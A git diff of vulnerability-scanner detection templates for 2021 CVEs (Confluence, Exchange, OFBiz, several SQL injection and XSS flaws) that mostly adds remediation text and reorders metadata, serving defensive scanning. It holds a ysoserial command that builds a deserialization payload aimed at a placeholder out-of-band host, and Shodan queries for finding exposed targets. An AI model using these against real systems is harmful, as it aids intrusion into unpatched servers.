a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 39c918d6e0..d1673d2380 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API. + remediation: | + Apply the latest security patch or update to a non-vulnerable version of Hue Magic. reference: - https://github.com/Foddy/node-red-contrib-huemagic/issues/217 - https://nvd.nist.gov/vuln/detail/CVE-2021-25864 @@ -14,14 +16,14 @@ info: cve-id: CVE-2021-25864 cwe-id: CWE-22 epss-score: 0.53923 - cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* epss-percentile: 0.97171 + cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 - shodan-query: title:"NODE-RED" - framework: node.js vendor: dgtl product: huemagic + framework: node.js + shodan-query: title:"NODE-RED" tags: cve,cve2021,huemagic,lfi http: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index d14b877e43..2e7c1d2104 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-25899 cwe-id: CWE-89 epss-score: 0.54555 - cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* epss-percentile: 0.97184 + cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"AURALL" vendor: void product: aurall_rec_monitor + shodan-query: html:"AURALL" tags: cve,cve2021,sqli,void,aurall http: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 4202bc9b4e..10369d9c7f 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk,philippedelteil severity: critical description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. + remediation: | + Apply the latest security patches provided by Atlassian to mitigate this vulnerability. reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-26084 cwe-id: CWE-917 epss-score: 0.97457 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.99929 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 13 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2021,rce,confluence,injection,ognl,kev http: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 2cbb826f2a..99d0721b9f 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint. + remediation: | + Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - https://jira.atlassian.com/browse/CONFSERVER-67893 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-26085 cwe-id: CWE-425 epss-score: 0.9661 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.99455 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive http: diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 44efe7e67b..cf7020a4e4 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -5,6 +5,8 @@ info: author: cocxanh severity: medium description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + remediation: | + Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-26086 cwe-id: CWE-22 epss-score: 0.94427 - cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.98891 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira_data_center + shodan-query: http.component:"Atlassian Jira" tags: lfi,packetstorm,cve,cve2021,jira,intrusive http: diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 87089363fd..8c8849cb6f 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter. + remediation: | + Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability. reference: - https://www.cacti.net/info/changelog - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00252 - cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* epss-percentile: 0.62358 + cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 66e141702e..bc6c4713ba 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + remediation: | + Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability. reference: - https://github.com/yumusb/CVE-2021-26295-POC - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html @@ -19,15 +21,15 @@ info: cve-id: CVE-2021-26295 cwe-id: CWE-502 epss-score: 0.97456 - cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* epss-percentile: 0.99928 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: "OFBiz.Visitor=" verified: true - ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex + max-request: 1 vendor: apache product: ofbiz + shodan-query: "OFBiz.Visitor=" + ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 949d989ac6..140b88e854 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI. + remediation: | + Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - https://files.eprints.org/2548/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-26475 cwe-id: CWE-79 epss-score: 0.00156 - cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* epss-percentile: 0.51402 + cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eprints diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 10d602a4c4..367e83c8a4 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -5,6 +5,8 @@ info: author: gy741,pdteam severity: medium description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. reference: - https://hackerone.com/reports/1081137 - http://karmainsecurity.com/KIS-2022-03 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-26598 cwe-id: CWE-287 epss-score: 0.00425 - cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* epss-percentile: 0.71111 + cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.html:"ImpressCMS" vendor: impresscms product: impresscms + shodan-query: http.html:"ImpressCMS" tags: hackerone,cve,cve2021,impresscms,unauth,cms http: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 61b515bbbd..ba3f7fb1bf 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI. + remediation: | + Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - https://files.eprints.org/2548/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.00156 - cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* epss-percentile: 0.51402 + cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eprints diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 355407b663..8da4e9a6ad 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter. + remediation: | + Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://vict0ni.me/report2web-xss-frame-injection.html - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-26710 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* epss-percentile: 0.40934 + cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redwood diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index f00a9d1da2..3ea563f107 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2. reference: - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.06264 - cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* epss-percentile: 0.9267 + cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jenzabar diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 98acbe6955..638d1b6eeb 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -5,6 +5,8 @@ info: author: aceseven (digisec360) severity: medium description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application. + remediation: | + Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability. reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-26812 cwe-id: CWE-79 epss-score: 0.00837 - cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* epss-percentile: 0.79912 + cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 - framework: moodle vendor: jitsi product: meet + framework: moodle tags: cve,cve2021,moodle,jitsi,xss,plugin http: diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index ac3cc6bfdb..8c3ec7fcd9 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -5,26 +5,26 @@ info: author: madrobot severity: critical description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + remediation: Apply the appropriate security update. reference: - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 - https://proxylogon.com/#timeline - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855 - remediation: Apply the appropriate security update. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-26855 cwe-id: CWE-918 epss-score: 0.9751 - cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* epss-percentile: 0.99969 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: vuln:CVE-2021-26855 vendor: microsoft product: exchange_server + shodan-query: vuln:CVE-2021-26855 tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev http: diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 0fd3481471..02a1929e04 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.02194 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.88002 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 1ff6f6f768..ff6b059eeb 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 - http://sercomm.com @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-27132 cwe-id: CWE-74 epss-score: 0.03662 - cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* epss-percentile: 0.9051 + cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sercomm diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index bb06bbdad9..4b57615c9a 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. + remediation: | + Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability. reference: - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* epss-percentile: 0.40466 + cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: csphere product: clansphere tags: cve,cve2021,clansphere,xss,cms,unauth diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index c4e0f82687..2ee3be43db 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* epss-percentile: 0.40466 + cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: csphere diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index e5510b2424..99c90f0c20 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27314 cwe-id: CWE-89 epss-score: 0.30796 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.96384 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index c49b1e6128..e69731e2fb 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27315 cwe-id: CWE-89 epss-score: 0.10777 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.94338 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 8b061b13ae..369b3531ab 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27316 cwe-id: CWE-89 epss-score: 0.10777 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.94338 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index a3a11fc09e..aa30b7c9dc 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27319 cwe-id: CWE-89 epss-score: 0.10777 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.94338 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index f908332dea..83bf28b5cf 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-27320 cwe-id: CWE-89 epss-score: 0.14008 - cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.94957 + cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index a4ca85685e..381d356781 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. + remediation: | + Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks. reference: - https://www.exploit-db.com/exploits/49597 - http://www.triconsole.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.0031 - cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* epss-percentile: 0.66185 + cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: intitle:TriConsole.com - PHP Calendar Date Picker verified: true + max-request: 1 vendor: triconsole product: datepicker_calendar + google-query: intitle:TriConsole.com - PHP Calendar Date Picker tags: xss,edb,cve,cve2021,triconsole http: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 3384d2d389..eddc5dc5ab 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -5,6 +5,8 @@ info: author: pdteam,bing0o severity: high description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set. + remediation: | + Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability. reference: - https://phabricator.wikimedia.org/T274736 - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-27358 cwe-id: CWE-306 epss-score: 0.02345 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.88377 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: cve,cve2021,grafana,unauth http: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 190232da88..69dd47543f 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. + remediation: | + Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/49942 - https://github.com/fudforum/FUDforum/issues/2 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00189 - cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* epss-percentile: 0.55657 + cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: 'http.html:"Powered by: FUDforum"' verified: true + max-request: 1 vendor: fudforum product: fudforum + shodan-query: 'http.html:"Powered by: FUDforum"' tags: xss,fudforum,edb,packetstorm,cve,cve2021 http: diff --git 